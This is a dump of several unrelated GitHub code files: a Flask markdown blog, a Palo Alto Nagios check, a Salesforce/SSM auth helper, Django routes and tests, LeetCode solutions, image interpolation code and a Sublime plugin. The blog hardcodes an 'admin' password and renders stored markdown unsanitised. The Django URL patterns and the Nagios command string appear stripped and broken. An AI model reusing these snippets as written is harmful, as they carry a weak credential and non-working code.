PASSWORD='admin'\n))\napp.config.from_envvar('PYMARK_SETTINGS', silent=True)\n\n\ndef connect_db():\n \"\"\"Connects to the specific database.\"\"\"\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv\n\n\ndef init_db():\n \"\"\"Initializes the database.\"\"\"\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Creates the database tables.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\ndef get_db():\n \"\"\"Opens a new database connection if there is none yet for the\n current application context.\n \"\"\"\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n\ndef key_exist(key):\n if request.form.has_key(key):\n return True\n else:\n return False\n\n\n@app.teardown_appcontext\ndef close_db(error):\n \"\"\"Closes the database again at the end of the request.\"\"\"\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\n\n###################################################################Test Mode##\n\n\n@app.route('/markdown', methods=['POST'])\ndef post_markdown():\n #request.form['title']\n #request.form['content']\n #print request.form['content']\n #content = Markup(markdown.markdown(request.form['content']))\n content = markdown2.markdown( \"#\"+ request.form['title']+ \"\\n\" +request.form['content'], extras=[\"code-friendly\",\"code-color\", \"cuddled-lists\",\"tables\",\"footnotes\",\"pyshell\",\"toc\"])\n\n return content\n\n\n#===============================================================================\n# User Mode\n#===============================================================================\n\n@app.context_processor\ndef inject_nav():\n db = get_db()\n cur = db.execute('select id, title, navigation from blog where navigation=1 order by id')\n rows = cur.fetchall()\n \n result = []\n 
for row in rows:\n        result.append((row["id"],row["title"]))\n    return {'navs': result, 'blogname':app.config['BLOGNAME']}\n\n\n@app.route('/')\ndef index():\n    db = get_db()\n    cur = db.execute('select id, title, content from blog where navigation=0 order by id desc LIMIT 5')\n    rows = cur.fetchall()\n    #content = Markup(markdown.markdown(entries))\n    #print entries\n    result = []\n    for row in rows:\n        content = markdown2.markdown(row["content"], extras=["code-friendly","code-color", "cuddled-lists","tables","footnotes","pyshell","toc"])\n        #content = Markup(markdown.markdown(row["content"]))\n        result.append((row["id"], row["title"], content))\n    \n    return render_template('index.html', result=result)\n    \n    \n\n@app.route('/blog/')\n@app.route('/blog/<int:id>')\ndef show_post(id=None):\n    if id:\n        db = get_db()\n        cur = db.execute('select id, title, content from blog where id = ?', [id])\n        row = cur.fetchone()\n        if row:\n            result = []\n            content = markdown2.markdown(row["content"], extras=["code-friendly","code-color", "cuddled-lists","tables","footnotes","pyshell","toc"])\n            #content = Markup(markdown.markdown(row["content"]))\n            result.append((row["id"], row["title"],content))\n            return render_template('blog.html', result=result)\n            #return render_template('show_blog.html', **locals())\n        else:\n            abort(404)\n    else:\n        db = get_db()\n        cur = db.execute('select id, title, content from blog where navigation=0 order by id desc')\n        rows = cur.fetchall()\n        #content = Markup(markdown.markdown(entries))\n        #print entries\n        result = []\n        for row in rows:\n            content = markdown2.markdown(row["content"], extras=["code-friendly","code-color", "cuddled-lists","tables","footnotes","pyshell","toc"])\n\n            result.append((row["id"], row["title"], content))\n        \n        return render_template('blog.html', result=result)\n        #return render_template('show_blog.html', **locals())\n\n\n\n#===============================================================================\n# Admin Mode\n#===============================================================================\n\n\n@app.route('/admin/')\ndef admin_post():\n    if not session.get('logged_in'):\n        #abort(401)\n        return redirect(url_for('login'))\n    db = get_db()\n    cur = db.execute('select id, title, navigation from blog order by id desc')\n    rows = cur.fetchall()\n    #content = Markup(markdown.markdown(entries))\n    #print entries\n    result = []\n    for row in rows:\n        result.append((row["title"],row["id"],row["navigation"]))\n\n    return render_template('admin.html', result=result)\n    #return render_template('show_blog.html', **locals())\n\n\n@app.route('/admin/edit/')\ndef new_post():\n    if not session.get('logged_in'):\n        return redirect(url_for('login'))\n    return render_template('editor_new.html')\n    #return render_template('show_blog.html', **locals())\n\n@app.route('/admin/edit/<int:id>', methods=['GET'])\ndef edit_post(id=None):\n    if not session.get('logged_in'):\n        return redirect(url_for('login'))\n    if id:\n        db = get_db()\n        cur = db.execute('select id, title, content, navigation from blog where id = ?', [id])\n        row = cur.fetchone()\n        if row:\n            #content = Markup(markdown.markdown(entries))\n            #print entries\n            result = []\n            result.append(row["id"])\n            result.append(row["title"])\n            result.append(row["content"])\n            result.append(row["navigation"])\n            return render_template('editor_update.html', result=result)\n        else:\n            abort(404)\n    abort(404)\n\n\n\n    \n@app.route('/admin/update', methods=['POST'])\ndef update_post():\n    if not session.get('logged_in'):\n        
return redirect(url_for('login'))\n    db = get_db()\n    #print request.form['type']\n    #print request.form['title']\n    #print request.form['content']\n    if request.form['type'] == 'new':\n        if 'navigation' in request.form: \n            if request.form['navigation'] == "yes":\n                db.execute("INSERT into blog (title, navigation, content, post_time) values (?, 1, ?, datetime('now'))", [request.form['title'], request.form['content']])\n                db.commit()\n            else:\n                db.execute("INSERT into blog (title, navigation, content, post_time) values (?, 0, ?, datetime('now'))", [request.form['title'], request.form['content']])\n                db.commit()\n        \n    elif request.form['type'] == 'update':\n        db.execute('UPDATE blog set title=?, content=? where id= ?', [request.form['title'], request.form['content'], request.form['id']])\n        db.commit()\n\n        if 'navigation' in request.form: \n            if request.form['navigation'] == "yes":\n                db.execute('UPDATE blog set navigation=1 where id=?', [request.form['id']])\n                db.commit()\n            else:\n                db.execute('UPDATE blog set navigation=0 where id=?', [request.form['id']])\n                db.commit()\n    \n    flash('New blog was successfully updated')\n    return redirect(url_for('admin_post'))\n\n\n@app.route('/admin/del/<int:id>', methods=['GET'])\ndef delete_post(id=None):\n    if not session.get('logged_in'):\n        return redirect(url_for('login'))\n    db = get_db()\n    db.execute('DELETE from blog where id = ?',[id])\n    db.commit()\n    flash('blog was successfully deleted')\n    return redirect(url_for('admin_post'))\n\n\n@app.route('/admin/upload_progress',methods=['POST'])\ndef upload_progress():\n    if not session.get('logged_in'):\n        return redirect(url_for('login'))\n    return json.dumps('')\n    \n\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n        filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@app.route('/admin/upload',methods=['GET', 'POST'])\ndef upload_file():\n    if not session.get('logged_in'):\n        return redirect(url_for('login'))\n    \n    if request.method == 'POST':\n        file = request.files['file']\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            return json.dumps({"name": "/uploads/"+filename})\n\n\n@app.route('/uploads/<filename>')\ndef uploaded_file(filename):\n    if not session.get('logged_in'):\n        return redirect(url_for('login'))\n    return send_from_directory(app.config['UPLOAD_FOLDER'], filename) \n    \n    \n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    error = None\n    if request.method == 'POST':\n        if request.form['username'] != app.config['USERNAME']:\n            error = 'Invalid username'\n        elif request.form['password'] != app.config['PASSWORD']:\n            error = 'Invalid password'\n        else:\n            session['logged_in'] = True\n            flash('You were logged in')\n            return redirect(url_for('admin_post'))\n    return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n    if not session.get('logged_in'):\n        return redirect(url_for('login'))\n    session.pop('logged_in', None)\n    flash('You were logged out')\n    return redirect(url_for('index'))","repo_name":"hacklogic/PyMarkBlog","sub_path":"uploads/pymark.py","file_name":"pymark.py","file_ext":"py","file_size_in_byte":10031,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"41256860178","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nimport nagiosplugin as np\nfrom nagiosplugin import CheckError\n\nfrom check_pa.xml_reader import XMLReader\n\n_log = logging.getLogger('nagiosplugin')\n\n\ndef create_check(args):\n    
\"\"\"\n Creates and configures a check for the useragent command.\n\n :return: the useragent check.\n \"\"\"\n return np.Check(\n UserAgent(args.host, args.token),\n np.ScalarContext('agent_last_heared', args.warn, args.crit),\n UserAgentContext('agent_connected'),\n UserAgentSummary())\n\n\nclass UserAgent(np.Resource):\n def __init__(self, host, token):\n self.host = host\n self.token = token\n self.cmd = 'all' \\\n ''\n self.xml_obj = XMLReader(self.host, self.token, self.cmd)\n\n def probe(self):\n \"\"\"\n Querys the REST-API and create user agent metrics.\n\n :return: a user agent metric.\n \"\"\"\n _log.info('Reading XML from: %s', self.xml_obj.build_request_url())\n soup = self.xml_obj.read()\n s = soup.result.string.strip()\n useragents = s.split('\\n\\n')\n\n for useragent in useragents:\n agent_details = useragent.split('\\n')\n if (len(agent_details) != 31) or not (agent_details[0].startswith('Agent')):\n raise CheckError('Unexpected query result!')\n\n name = agent_details[0]\n status = agent_details[1].split(':')[1].strip()\n last_heared = int(agent_details[20].split(':')[1].strip())\n\n _log.info('Checking %s ', name)\n _log.info('Found status %s', status)\n _log.info('Last heared: %i seconds ago', last_heared)\n\n yield np.Metric(name, status, context='agent_connected')\n yield np.Metric(name, last_heared, context='agent_last_heared')\n\n\nclass UserAgentContext(np.Context):\n def __init__(self, name, fmt_metric='{name} is {valueunit}',\n result_cls=np.Result):\n super(UserAgentContext, self).__init__(name, fmt_metric,\n result_cls)\n\n def evaluate(self, metric, resource):\n if metric.value == 'conn':\n return self.result_cls(np.Ok, None, metric)\n else:\n return self.result_cls(np.Critical, None, metric)\n\n\nclass UserAgentSummary(np.Summary):\n def ok(self, results):\n return 'All agents are connected and responding.'\n\n def problem(self, results):\n s = ''\n l = []\n for result in results.results:\n if result.state == np.Warn or result.state == np.Critical:\n if result.metric.context == 'agent_last_heared':\n l.append(\"%s last heared: %i seconds ago\" % (result.metric.name, result.metric.value))\n if result.metric.context == 'agent_connected':\n l.append(\"%s connection status is %s\" % (result.metric.name, result.metric.value))\n s += ', '.join(l)\n return s\n","repo_name":"ralph089/nagios_check_paloalto","sub_path":"check_pa/modules/useragent.py","file_name":"useragent.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"31122605102","text":"import boto3, os\nfrom aws_lambda_powertools import Logger\nfrom simple_salesforce import Salesforce\nfrom ssm import SsmConfig\n\nlogger = Logger(service=\"playback-loader\", child=True)\nclient = boto3.client('ssm')\n\nsf_ssm_parameter_path = os.environ.get('SF_SSM_PARAMETER_PATH')\n\n# global variable\nsf_ssm_config = None\n\nclass SfAuth:\n\n def __init__(self):\n global sf_ssm_config\n # Initialize ssm_config if it doesn't yet exist\n if sf_ssm_config is None:\n ssm = SsmConfig()\n logger.debug(\"Loading SsmConfig\")\n ssm.load_config(sf_ssm_parameter_path)\n sf_ssm_config = ssm\n\n config = sf_ssm_config.get_config()\n if len(config['cache_sf_instance']) <= 1:\n self.login()\n else:\n self.sf = Salesforce(instance=config['cache_sf_instance'],\n session_id=config['cache_session_id'])\n\n def get_sf(self):\n return self.sf\n\n def login(self):\n logger.debug(f\"SfAuth login start\")\n\n global sf_ssm_config\n config = 
sf_ssm_config.get_config()\n self.sf = Salesforce(username=config['username'],\n consumer_key=config['consumer_key'],\n privatekey=config['private_key'],\n domain=config['domain']) \n\n # save session to ssm to prevent login multiple time over the day\n sf_ssm_config.update_parameter(\n f\"{sf_ssm_parameter_path}/cache_session_id\", self.sf.session_id)\n sf_ssm_config.update_parameter(\n f\"{sf_ssm_parameter_path}/cache_sf_instance\", self.sf.sf_instance)\n\n # reload configuration\n sf_ssm_config.load_config(sf_ssm_parameter_path)\n logger.debug(f\"SfAuth login completed\")\n return self.sf\n","repo_name":"pattaramo/fwd-aws-connect-playback-loader","sub_path":"app/sf_auth.py","file_name":"sf_auth.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1892917153","text":"from django.urls import path\n\n\nfrom .views import post_detail, post_create, post_delete, post_user_detail, withdraw, \\\n post_comment, post_list, post_like, post_dislike\n\napp_name = 'posts'\nurlpatterns = [\n path('', post_list, name='post-list'),\n path('/', post_detail, name='post-detail'),\n path('create/', post_create, name='post-create'),\n path('/delete/', post_delete, name='post-delete'),\n path('user_detail/', post_user_detail, name='post-user-detail'),\n path('withdraw/', withdraw, name='withdraw'),\n path('/comment/', post_comment, name='post-comment'),\n path('/like/', post_like, name='post-like'),\n path('/dislike/', post_dislike, name='post-dislike'),\n\n]\n","repo_name":"HiFaMi/Django-instagram","sub_path":"app/posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12538592248","text":"class Solution:\n def longestLine(self, M: List[List[int]]) -> int:\n if len(M) == 0:\n return 0\n\n rows, cols = len(M), len(M[0])\n max_len = 0\n\n @lru_cache(maxsize=None)\n def dfs(row, col, direction):\n subpath = 0\n # directions: left, up, upleft, upright\n ro, co = direction\n new_row, new_col = row + ro, col + co\n if 0 <= new_row and new_row < rows and \\\n 0 <= new_col and new_col < cols and \\\n M[new_row][new_col] == 1:\n subpath = dfs(new_row, new_col, direction)\n \n return (M[row][col] == 1) + subpath\n\n\n for row in range(rows):\n for col in range(cols):\n for direction in [(0, 1), (-1, 0), (-1, -1), (-1, 1)]:\n max_len = max(max_len, dfs(row, col, direction))\n \n return max_len\n\n\nclass SolutionManualMemoization:\n def longestLine(self, M: List[List[int]]) -> int:\n \n if len(M) == 0:\n return 0\n \n rows, cols = len(M), len(M[0])\n max_len = 0\n \n path_counter = defaultdict(int)\n \n for row in range(rows):\n for col in range(cols):\n for direction in [row, col+.1, row-col+.2, row+col+.3]:\n new_count = (path_counter[direction] + 1) * M[row][col]\n path_counter[direction] = new_count\n max_len = max(max_len, new_count)\n \n return max_len","repo_name":"liaison/LeetCode","sub_path":"python/562_longest_line_of_consecutive_one_in_a_matrix.py","file_name":"562_longest_line_of_consecutive_one_in_a_matrix.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"70482482794","text":"import cv2 as cv\nimport numpy as np\nimport math\ndef weight(x):\n a=-0.5\n x=abs(x)\n if x<=1:\n return (a+2)*x**3-(a+3)*x**2+1\n if x<2:\n return a*x**3-5*a*x**2+8*a*x-4*a\n return 0\ndef 
zoom(source,filename):\n result=[np.zeros((2048,2048)),np.zeros((2048,2048)),np.zeros((2048,2048))]\n range_list=range(2048)\n range_tmp=range(4)\n for i in range_list:\n for j in range_list:\n if i>4 and i<2040 and j>4 and j<2040:\n result[0][i][j]=source[round(i/4)][round(j/4)]\n m,n,a,b=i//4,j//4,i/4-i//4,j/4-j//4\n result[1][i][j]=source[m][n]*(1-a)*(1-b)+source[m+1][n]*a*(1-b)+source[m][n+1]*(1-a)*b+source[m+1][n+1]*a*b\n for k in range_tmp:\n for w in range_tmp:\n result[2][i][j]+=source[i//4+k-1][j//4+w-1]*weight(i/4-(i//4+k-1))*weight(j/4-(j//4+w-1))\n else:\n result[0][i][j]=source[i//4][j//4]\n result[1][i][j]=source[i//4][j//4]\n result[2][i][j]=source[i//4][j//4]\n result[0]=result[0].astype(np.uint8)\n cv.imwrite(filename+\"_nearest.bmp\",result[0])\n result[1]=result[1].astype(np.uint8)\n cv.imwrite(filename+\"_Bilinear.bmp\",result[1])\n result[2]=result[2].astype(np.uint8)\n cv.imwrite(filename+\"_Bicubic.bmp\",result[2])\n\nimg1=cv.imread(\"lena.bmp\")\nimg2=cv.imread(\"elain1.bmp\")\nimg_lena_shear,img_elain_shear,img_lena_rotate,img_elain_rotate=np.zeros((512,512)),np.zeros((512,512)),np.zeros((512,512)),np.zeros((512,512))\nfor i in range(512):\n for j in range(512):\n if math.floor(i+0.5*j)<512:\n img_lena_shear[math.floor(i+0.5*j)][j]=img1[i][j][0]\n img_elain_shear[math.floor(i+0.5*j)][j]=img2[i][j][0]\nimg_lena_shear=img_lena_shear.astype(np.uint8)\nzoom(img_lena_shear,\"lena_shear\")\nimg_elain_shear=img_elain_shear.astype(np.uint8)\nzoom(img_elain_shear,\"elain_shear\")\na,b=math.cos(math.pi/6),math.sin(math.pi/6)\nT=np.array([[a,b,0],[-b,a,0],[0,0,1]])\nT=np.linalg.inv(T)\nfor i in range(512):\n for j in range(512):\n A=np.dot(np.array([i-256,j-256,1]),T)+np.array([256,256,0])\n A=A.astype(np.int)\n if A[0]>0 and A[0]<512 and A[1]>0 and A[1]<512:\n img_lena_rotate[i][j]=img1[A[0]][A[1]][0]\n img_elain_rotate[i][j]=img2[A[0]][A[1]][0]\nimg_lena_rotate=img_lena_rotate.astype(np.uint8)\nzoom(img_lena_rotate,\"lena_rotate\")\nimg_elain_rotate=img_elain_rotate.astype(np.uint8)\nzoom(img_elain_rotate,\"elain_rotate\")","repo_name":"KezhiAdore/Digital_Image_Processing","sub_path":"1.图像插值/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"7502619036","text":"import sublime\nimport sublime_plugin\n\nimport os\n\n\ndef find_project_path(path):\n while True:\n if not path or os.path.exists(os.path.join(path,\n 'Vintageous.sublime-project')):\n return path\n\n path = os.path.dirname(path)\n\n\nclass RunTestsForActiveViewCommand(sublime_plugin.WindowCommand):\n '''\n Runs tests:\n\n - from a file with the name 'test_' if it exists,\n - from a file with the .cmd-test[-solo] extension,\n - else, from the active file.\n '''\n\n def run(self):\n v = self.window.active_view()\n if v is None:\n return\n\n proj_path = find_project_path(v.file_name())\n if not proj_path or not v.file_name().endswith(('.py', '.cmd-test', '.cmd-test-solo')):\n print(\n 'Vintageous (Dev): Not a project, cmd-test or python file: '\n + v.file_name())\n return\n\n # If it's a test_* file, run it.\n if os.path.basename(v.file_name()).startswith('test_'):\n self.window.run_command('run_vintageous_tests', {\n 'active_file_only': True,\n 'working_dir': proj_path\n })\n return\n\n # If it's a normal file, try to find its tests.\n tail = os.path.join('tests', v.file_name()[len(proj_path) + 1:])\n full = os.path.join(proj_path, os.path.dirname(tail),\n 'test_' + os.path.basename(tail))\n 
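# If a matching test_* module exists under tests/, run only that module's tests.\n        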
if os.path.exists(full):\n self.window.run_command('run_vintageous_tests', {\n 'loader_pattern': os.path.basename(full),\n 'working_dir': proj_path\n })\n return\n\n # Otherwise just run it.\n self.window.run_command('run_vintageous_tests', {\n 'active_file_only': True,\n 'working_dir': proj_path\n })\n\n\nclass RunAllTestsCommand(sublime_plugin.WindowCommand):\n '''This command only exists because we can't expand ${project_path}\n in keymap files.\n '''\n def run(self):\n v = self.window.active_view()\n if v is None:\n return\n\n self.window.run_command('run_vintageous_tests', {\n 'working_dir': find_project_path(v.file_name())\n })\n","repo_name":"guillermooo/Vintageous","sub_path":"dev_cmds.py","file_name":"dev_cmds.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":1641,"dataset":"github-code","pt":"72"} +{"seq_id":"40438131779","text":"# -*- coding: utf-8 -*-\n# @Author: Lich_Amnesia\n# @Email: alwaysxiaop@gmail.com\n# @Date: 2016-10-07 00:25:24\n# @Last Modified time: 2016-10-07 00:35:49\n# @FileName: 139.py\n\n\nclass Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: Set[str]\n :rtype: bool\n \"\"\"\n dic = {}\n\n def dfs(start):\n if start >= len(s):\n return True\n \n if start not in dic:\n for word in wordDict:\n k = len(word)\n for j in range(len(word)):\n if start + j < len(s) and word[j] == s[start + j]:\n k -= 1\n if k == 0 and dfs(start + len(word)):\n dic[start] = True\n return dic[start]\n dic[start] = False\n return False\n return dic[start]\n \n # dfs(0)\n # print dic\n return dfs(0)","repo_name":"LichAmnesia/LeetCode","sub_path":"python/139.py","file_name":"139.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28038469181","text":"import random\nimport time\n\n\nclass EightPuzzle:\n def __init__(self):\n #self.values = [0,1,3,4,2,5,7,8,6]\n self.values = [8,1,3,4,0,2,7,6,5]\n self.previousValues = []\n self.currentPossibleMoves = []\n self.emptySquarePosition = -1\n self.fitness = -1\n\n self.updateState()\n\n def updateState(self):\n self.emptySquarePosition = self.values.index(0)\n self.getPossibleMoves()\n # DO this\n self.getCurrentStateFitness()\n\n def generateRandomPuzzle(self):\n valuesList = list(range(9))\n random.shuffle(valuesList)\n self.values = valuesList\n print(self.values)\n\n def printCurrentPuzzle(self):\n print('_______________________________________________________________')\n print ('|' + str(self.values[0]) + '|' + str(self.values[1]) + '|' + str(self.values[2]) + '|')\n print ('|' + str(self.values[3]) + '|' + str(self.values[4]) + '|' + str(self.values[5]) + '|')\n print ('|' + str(self.values[6]) + '|' + str(self.values[7]) + '|' + str(self.values[8]) + '|')\n\n def getPossibleMoves(self):\n if self.emptySquarePosition == 0:\n self.currentPossibleMoves = ['right', 'down']\n elif self.emptySquarePosition == 1:\n self.currentPossibleMoves = ['left', 'right', 'down']\n elif self.emptySquarePosition == 2:\n self.currentPossibleMoves = ['left', 'down']\n elif self.emptySquarePosition == 3:\n self.currentPossibleMoves = ['right', 'up', 'down']\n elif self.emptySquarePosition == 4:\n self.currentPossibleMoves = ['left','right', 'up', 'down']\n elif self.emptySquarePosition == 5:\n self.currentPossibleMoves = ['left', 'up', 'down']\n elif self.emptySquarePosition == 6:\n self.currentPossibleMoves = ['right', 'up']\n elif self.emptySquarePosition 
== 7:\n self.currentPossibleMoves = ['left','right', 'up']\n elif self.emptySquarePosition == 8:\n self.currentPossibleMoves = ['left', 'up']\n\n def moveUp(self):\n if 'up' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition - 3]\n self.values[self.emptySquarePosition - 3] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def moveDown(self):\n if 'down' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition + 3]\n self.values[self.emptySquarePosition + 3] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def moveLeft(self):\n if 'left' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition - 1]\n self.values[self.emptySquarePosition - 1] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def moveRight(self):\n if 'right' in self.currentPossibleMoves:\n self.previousValues = list(self.values)\n aux = self.values[self.emptySquarePosition + 1]\n self.values[self.emptySquarePosition + 1] = 0\n self.values[self.emptySquarePosition] = aux\n self.updateState()\n return True\n else:\n return False\n\n def move(self, selectedMove):\n if selectedMove == 'up':\n self.moveUp()\n elif selectedMove == 'down':\n self.moveDown()\n elif selectedMove == 'left':\n self.moveLeft()\n elif selectedMove == 'right':\n self.moveRight()\n\n def getCurrentStateFitness(self):\n fitness = 0\n if self.values[0] == 1:\n fitness += 1\n if self.values[1] == 2:\n fitness += 1\n if self.values[2] == 3:\n fitness += 1\n if self.values[3] == 4:\n fitness += 1\n if self.values[4] == 5:\n fitness += 1\n if self.values[5] == 6:\n fitness += 1\n if self.values[6] == 7:\n fitness += 1\n if self.values[7] == 8:\n fitness += 1\n if self.values[8] == 0:\n fitness += 1\n self.fitness = fitness\n\n def finished(self):\n if self.fitness == 9:\n return True\n else:\n return False\n\n def restoreState(self):\n self.values = list(self.previousValues)\n self.updateState()\n\n\ndef findSolutionPuzzleHillClimbing():\n startTime = time.time()\n\n puzzle = EightPuzzle()\n currentFitness = puzzle.fitness\n\n nextMove = random.choice(['up', 'down', 'left', 'right'])\n\n temperature = 100\n\n while not puzzle.finished():\n movesFitness = {'up': 0, 'down': 0, 'left': 0, 'right': 0}\n\n if puzzle.moveUp():\n movesFitness['up'] = puzzle.fitness\n puzzle.restoreState()\n\n if puzzle.moveDown():\n movesFitness['down'] = puzzle.fitness\n puzzle.restoreState()\n\n if puzzle.moveLeft():\n movesFitness['left'] = puzzle.fitness\n puzzle.restoreState()\n\n if puzzle.moveRight():\n movesFitness['right'] = puzzle.fitness\n puzzle.restoreState()\n\n found = False\n\n for move in movesFitness:\n if movesFitness[move] > currentFitness:\n currentFitness = movesFitness[move]\n nextMove = move\n found = True\n\n if found:\n puzzle.move(nextMove)\n currentFitness = puzzle.fitness\n else:\n found = False\n for move in movesFitness:\n if movesFitness[move] == currentFitness:\n nextMove = move\n found = True\n\n if found and temperature > 0:\n temperature -= 1\n puzzle.move(nextMove)\n currentFitness = puzzle.fitness\n else:\n return time.time() - startTime, puzzle.values, puzzle.fitness\n\n return time.time() - startTime, puzzle.values, 
puzzle.fitness\n\n\nprint(findSolutionPuzzleHillClimbing())\n","repo_name":"CristianVerdes/AI-Homework1","sub_path":"tema1.py","file_name":"tema1.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18813821557","text":"from rest_framework import status\nfrom rest_framework.test import APIClient, APITestCase\nfrom datetime import datetime, timedelta\n\nfrom events.models import Event\nfrom tickets.models import TicketAvailability, TicketReservation\nfrom tickets.serializers import TicketAvailabilitySerializer, TicketReservationRetrieveSerializer\nfrom ticket_selling.urls import API_BASE_URL\n\nclass GetTicketAvailabilityInfoTest(APITestCase):\n client = APIClient()\n\n def setUp(self):\n self.event = Event.objects.create(\n id='e8f4e683-e873-4a20-a5b1-ec3fae004f92', \n name=\"Robert 25th birthday party!\", \n start_datetime=datetime(2021, 1, 29, 18, 0)\n )\n\n self.first_ticket_type = TicketAvailability(\n id='e2273ee4-d3f0-4d76-804e-2ce9732be0c5',\n event=self.event,\n type='''Robert's mom''',\n quantity=0\n )\n\n self.second_ticket_type = TicketAvailability(\n id='e82501a1-f0ff-43e2-88cb-6c09f85086f8',\n event=self.event,\n type='''Robert's colleagues''',\n quantity=15\n )\n\n def test_get_info_about_tickets_availability(self):\n response = self.client.get(f'/{API_BASE_URL}events/{self.event.pk}/tickets/')\n queryset = TicketAvailability.objects.all()\n serializer = TicketAvailabilitySerializer(queryset, many=True)\n self.assertEqual(response.data, serializer.data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n\nclass ReserveTicketTest(APITestCase):\n client = APIClient()\n\n def setUp(self):\n self.event = Event.objects.create(\n id='e8f4e683-e873-4a20-a5b1-ec3fae004f92', \n name=\"Robert 25th birthday party!\", \n start_datetime=datetime(2021, 1, 29, 18, 0)\n )\n\n self.ticket_type = TicketAvailability.objects.create(\n id='e82501a1-f0ff-43e2-88cb-6c09f85086f8',\n event=self.event,\n type='''Robert's colleagues''',\n quantity=15\n )\n\n self.sold_ticket_type = TicketAvailability.objects.create(\n id='e2273ee4-d3f0-4d76-804e-2ce9732be0c5',\n event=self.event,\n type='''Robert's mom''',\n quantity=0\n )\n\n self.reserved_ticket = TicketReservation.objects.create(\n event=self.event,\n ticket_type=self.sold_ticket_type.type,\n )\n\n def test_making_reservation(self):\n from django.contrib.auth.models import User\n user = User.objects.create_superuser('john', 'lennon@thebeatles.com', 'johnpassword')\n\n base_quantity = self.ticket_type.quantity\n self.client.force_login(user=user)\n data = {\n \"event_id\": self.event.pk,\n \"ticket_type\": self.ticket_type.type\n }\n response = self.client.post(f'/{API_BASE_URL}tickets/', data=data)\n\n self.ticket_type.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(self.ticket_type.quantity, base_quantity - 1)\n\n def test_sold_ticket_reservation(self):\n from django.contrib.auth.models import User\n user = User.objects.create_superuser('john', 'lennon@thebeatles.com', 'johnpassword')\n\n self.client.force_login(user=user)\n data = {\n \"event_id\": self.event.pk,\n \"ticket_type\": self.sold_ticket_type.type\n }\n\n response = self.client.post(f'/{API_BASE_URL}tickets/', data=data)\n\n self.ticket_type.refresh_from_db()\n\n self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)\n self.assertEqual(self.sold_ticket_type.quantity, 0)\n\n def 
test_get_info_about_reservation(self):\n        response = self.client.get(f'/{API_BASE_URL}tickets/{self.reserved_ticket.id}/')\n        serializer = TicketReservationRetrieveSerializer(self.reserved_ticket)\n\n        self.assertEqual(response.status_code, status.HTTP_200_OK)\n        self.assertEqual(response.data, serializer.data)\n","repo_name":"noxITRS/ticket_selling","sub_path":"ticket_selling/tickets/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40187251530","text":"\nclass User(object):\n    def __init__(self,name=None,mail=None,wishes=None):\n        self.name = name\n        self.mail = mail\n        if wishes is not None:\n            self.wishes = [v.strip() for v in wishes]\n        else:\n            self.wishes = wishes\n    def __repr__(self):\n        return \"Name: {0}\\nMail: {1}\\nWishes: {2}\".format(\\\n            self.name,self.mail,self.wishes)\n    \n    def __str__(self):\n        return self.__repr__()\n    \ndef get_users(filename: str):\n    \"\"\"\n    Return a list of User objects read from the users file\n    \"\"\"\n    users = []\n    with open(filename, mode='r', encoding='utf-8') as contacts_file:\n        for i,a_contact in enumerate(contacts_file):\n            if i == 0 or (a_contact.strip() == ''):\n                # skip the header line and blank lines\n                continue\n            #Name,UserName,Mail,Password,OldPassword\n            fields = a_contact.split(',')\n            user = User(name=fields[0],mail=fields[1].strip(),wishes=fields[2:])\n            users.append(user)\n    \n    return users\n\ndef save_users(filename: str,users: list):\n    \"\"\"\n    Save the users into a CSV file\n    \"\"\"\n\n    with open(filename,mode='w+') as f:\n        f.write('Name,Mail,Wishes\\n')\n        for u in users: \n            message = \"\"\n            for v in u.wishes:\n                message += v+','\n            